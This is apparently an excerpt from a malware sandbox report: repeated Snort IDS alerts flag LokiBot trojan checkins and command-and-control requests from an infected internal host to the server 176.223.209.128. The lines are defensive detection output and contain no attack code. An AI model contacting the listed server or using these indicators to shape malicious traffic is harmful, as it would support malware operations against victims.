        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49882 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49883 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49883 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49883 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49883 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49884 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49884 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49884 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49884 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49885 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49885 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49885 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49885 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49886 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49886 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49886 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49886 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49887 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49887 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49887 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49887 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49888 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49888 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49888 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49888 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49889 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49889 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49889 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49889 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49890 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49890 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49890 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49890 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49891 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49891 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49891 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49891 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49892 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49892 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49892 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49892 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49893 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49893 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49893 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49893 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49894 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49894 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49894 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49894 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49895 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49895 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49895 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49895 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49896 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49896 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49896 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49896 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49897 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49897 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49897 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49897 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49898 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49898 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49898 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49898 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49899 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49899 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49899 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49899 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49900 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49900 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49900 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49900 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49901 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49901 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49901 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49901 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49902 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49902 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49902 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49902 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49903 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49903 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49903 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49903 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49904 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49904 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49904 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49904 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49905 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49905 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49905 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49905 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49906 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49906 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49906 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49906 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49907 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49907 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49907 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49907 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49908 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49908 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49908 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49908 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49909 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49909 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49909 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49909 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49911 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49911 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49911 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49911 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49912 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49912 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49912 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49912 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49913 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49913 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49913 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49913 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49914 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49914 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49914 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49914 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49915 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49915 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49915 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49915 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49916 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49916 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49916 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49916 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49917 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49917 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49917 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49917 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49918 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49918 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49918 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49918 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49919 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49919 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49919 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49919 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49920 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49920 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49920 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49920 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49921 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49921 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49921 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49921 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49922 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49922 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49922 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49922 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49923 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49923 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49923 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49923 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49924 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49924 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49924 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49924 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49925 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49925 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49925 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49925 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49926 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49926 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49926 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49926 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49927 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49927 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49927 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49927 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49928 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49928 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49928 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49928 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49929 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49929 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49929 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49929 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49930 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49930 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49930 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49930 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49931 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49931 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49931 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49931 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49932 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49932 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49932 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49932 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49933 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49933 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49933 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49933 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49934 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49934 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49934 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49934 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49935 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49935 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49935 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49935 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49936 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49936 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49936 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49936 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49937 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49937 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49937 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49937 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49938 -> 176.223.209.128:80
